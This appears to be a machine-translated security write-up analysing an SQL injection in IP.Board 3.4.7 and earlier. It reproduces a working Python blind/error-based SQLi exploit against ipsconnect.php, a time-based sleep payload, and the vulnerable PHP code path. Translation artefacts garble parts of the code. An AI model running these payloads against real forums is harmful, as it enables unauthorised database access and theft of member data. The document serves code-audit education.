IP. Board & lt; = 3.4.7 SQL Injection Analysis

IP. Board <= 3.4.7 SQL Injection Analysis

IPB, short for Invision Power Board, is a PHP-developed Forum program that is widely used abroad. This article analyzes the SQL injection vulnerability in version 3.4.7 and earlier versions.

Poc link http://seclists.org/fulldisclosure/2014/Nov/20

#!/usr/bin/env python# Sunday, November 09, 2014 - secthrowaway () safe-mail net# IP.Board <= 3.4.7 SQLi (blind, error based); # you can adapt to other types of blind injection if 'cache/sql_error_latest.cgi' is unreadableurl = 'http://ipb /'ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36"import sys, reimport urllib2, urllibdef inject(sql):try:urllib2.urlopen(urllib2.Request('%sinterface/ipsconnect/ipsconnect.php' % url, data="act=login&idType=id&id[]=-1&id[]=%s" % urllib.quote('-1) and 1!="\'" and extractvalue(1,concat(0x3a,(%s)))#\'' % sql), headers={"User-agent": ua}))except urllib2.HTTPError, e:if e.code == 503:data = urllib2.urlopen(urllib2.Request('%scache/sql_error_latest.cgi' % url, headers={"User-agent": ua})).read()txt = re.search("XPATH syntax error: ':(.*)'", data, re.MULTILINE)if txt is not None: return txt.group(1)sys.exit('Error [3], received unexpected data:\n%s' % data)sys.exit('Error [1]')sys.exit('Error [2]')n = inject('SELECT COUNT(*) FROM members')

Run it and check/cache/SQL _error_latest.cgi. You can see that mysql reports an error,

mySQL query error: SELECT m.*, m.member_id as my_member_id,ccb.cache_content FROM members m  LEFT JOIN content_cache_sigs ccb ON ( ccb.cache_content_id=m.member_id )   WHERE m.member_id IN (-1,-1)  and extractvalue(1,concat(0x3a,(user())))#)

The injection is successful, but the access to cgi is 404. Because some servers disable access to cgi files by default, the author also said that blind injection can be used for testing.
Simplify poc, a post Packet

[post] http://ipb/interface/ipsconnect/ipsconnect.phpact=login&idType=id&id[]=-1&id[]=-1) or sleep(10)#

View/interface/ipsconnect. php

$params = array();foreach ( $map[ $_REQUEST['act'] ] as $k ){$params[ $k ] = $_REQUEST[ $k ];}

$ _ REQUEST is used here. View $ params,

array(6) { ["idType"]=> string(2) "id" ["id"]=> array(2) { [0]=> string(2) "-1" [1]=> string(17) "-1) or sleep(10)#" } ["password"]=> NULL ["key"]=> NULL ["redirect"]=> NULL ["redirectHash"]=> NULL }

Then call the ipsConnect login function with the parameter name.

'login'=> array( 'idType', 'id', 'password', 'key', 'redirect', 'redirectHash' ),

public function login( $identifier, $identifierValue, $md5Password, $key, $redirect, $redirectHash )

$ Identifier is id and IPSMember: load is called.

if ( in_array( $identifier, array( 'id', 'email', 'username' ) ) ){$member = IPSMember::load( $identifierValue, 'none', $identifier );

Here $ identifierValue is Array, $ identifier is id
View/admin/sources/base/ipsMember. php

Static public function load ($ member_key, $ extra_tables = 'all', $ key_type = '') case 'id': if (is_array ($ member_key )) {$ multiple_ids = $ member_key; // array, no type conversion} else {$ member_value = intval ($ member_key);} $ member_field = 'Member _ id ';

$ Multiple_ids is Array, and $ joins is

array(1) { [0]=> array(4) { ["select"]=> string(17) "ccb.cache_content" ["from"]=> array(1) { ["content_cache_sigs"]=> string(3) "ccb" } ["where"]=> string(32) "ccb.cache_content_id=m.member_id" ["type"]=> string(4) "left" } }

 

if ( count( $joins ) ){ipsRegistry::DB()->build( array( 'select'   => 'm.*, m.member_id as my_member_id',                                 'from'     => array( 'members' => 'm' ),'where'    => ( is_array( $multiple_ids ) AND count( $multiple_ids ) ) ?  'm.'. $member_field . ' IN (' . implode( ',', $multiple_ids ) . ')' : 'm.'. $member_field . '=' . $member_value,'add_join' => $joins ) );}else{ipsRegistry::DB()->build( array( 'select'   => '*','from'     => 'members',        'where'    => ( is_array( $multiple_ids ) AND count( $multiple_ids ) ) ?  $member_field . ' IN (' . implode( ',', $multiple_ids ) . ')' : $member_field . '=' . $member_value ) );}ipsRegistry::DB()->execute();

$ Multiple_ids is an array and is finally spliced into the where statement.

array(4) {  ["select"]=>  string(32) "m.*, m.member_id as my_member_id"  ["from"]=>  array(1) {    ["members"]=>    string(1) "m"  }  ["where"]=>  string(37) "m.member_id IN (-1,-1) or sleep(10)#)"  ["add_join"]=>  array(1) {    [0]=>    array(4) {      ["select"]=>      string(17) "ccb.cache_content"      ["from"]=>      array(1) {        ["content_cache_sigs"]=>        string(3) "ccb"      }      ["where"]=>      string(32) "ccb.cache_content_id=m.member_id"      ["type"]=>      string(4) "left"    }  }}

The execution is successful, with a latency of 10 s.

We can see that $ key_type is id, fb_uid, twitter_id, $ member_key is a number, $ multiple_ids = $ member_key; is not filtered, And because ipsconnect. if (in_array ($ identifier, array ('id', 'email ', 'username') in php, it cannot be used here. It is not found elsewhere, but it is also a potential risk.

Part of the problem is that the array is not filtered here. In other programs, there are similar situations of not filtering arrays or not filtering $ key. When auditing code, pay more attention to the array situation.